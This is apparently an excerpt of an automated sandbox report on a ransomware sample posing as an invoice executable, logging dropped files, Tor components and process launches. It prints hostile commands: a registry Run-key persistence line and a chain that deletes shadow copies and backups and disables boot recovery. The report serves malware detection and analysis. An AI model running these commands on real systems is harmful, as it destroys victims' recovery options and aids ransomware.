            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /fJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Request for Quotation (RFQ_196).zip.zipStatic file information: File size 3482858 > 1048576
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,10_2_100011D0
            Source: libeay32.dll.59.drStatic PE information: section name: /4
            Source: libeay32.dll.59.drStatic PE information: section name: /19
            Source: libeay32.dll.59.drStatic PE information: section name: /31
            Source: libeay32.dll.59.drStatic PE information: section name: /45
            Source: libeay32.dll.59.drStatic PE information: section name: /57
            Source: libeay32.dll.59.drStatic PE information: section name: /70
            Source: libeay32.dll.59.drStatic PE information: section name: /81
            Source: libeay32.dll.59.drStatic PE information: section name: /92
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /4
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /19
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /31
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /45
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /57
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /70
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /81
            Source: libevent-2-0-5.dll.59.drStatic PE information: section name: /92
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /4
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /19
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /31
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /45
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /57
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /70
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /81
            Source: libevent_core-2-0-5.dll.59.drStatic PE information: section name: /92
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /4
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /19
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /31
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /45
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /57
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /70
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /81
            Source: libevent_extra-2-0-5.dll.59.drStatic PE information: section name: /92
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /4
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /19
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /31
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /45
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /57
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /70
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /81
            Source: libgcc_s_sjlj-1.dll.59.drStatic PE information: section name: /92
            Source: libssp-0.dll.59.drStatic PE information: section name: /4
            Source: libssp-0.dll.59.drStatic PE information: section name: /19
            Source: libssp-0.dll.59.drStatic PE information: section name: /31
            Source: libssp-0.dll.59.drStatic PE information: section name: /45
            Source: libssp-0.dll.59.drStatic PE information: section name: /57
            Source: libssp-0.dll.59.drStatic PE information: section name: /70
            Source: libssp-0.dll.59.drStatic PE information: section name: /81
            Source: libssp-0.dll.59.drStatic PE information: section name: /92
            Source: ssleay32.dll.59.drStatic PE information: section name: /4
            Source: ssleay32.dll.59.drStatic PE information: section name: /19
            Source: ssleay32.dll.59.drStatic PE information: section name: /31
            Source: ssleay32.dll.59.drStatic PE information: section name: /45
            Source: ssleay32.dll.59.drStatic PE information: section name: /57
            Source: ssleay32.dll.59.drStatic PE information: section name: /70
            Source: ssleay32.dll.59.drStatic PE information: section name: /81
            Source: ssleay32.dll.59.drStatic PE information: section name: /92
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10006BD0 push eax; ret 10_2_10006BFE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx86_2_6CDABDFB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx86_2_6CDABECB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx86_2_6CDABF9B

            Persistence and Installation Behavior

            barindex
            Command shell drops VBS files
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbs
            Drops PE files to the document folder of the user
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
            Uses bcdedit to modify the Windows boot settings
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: attrib.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: attrib.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: reg.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: reg.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: attrib.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: attrib.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dllJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\taskdl.exeJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\taskse.exeJump to dropped file
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\~SD1F4B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\~SD1F4C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\~SD1F4D.tmpJump to behavior
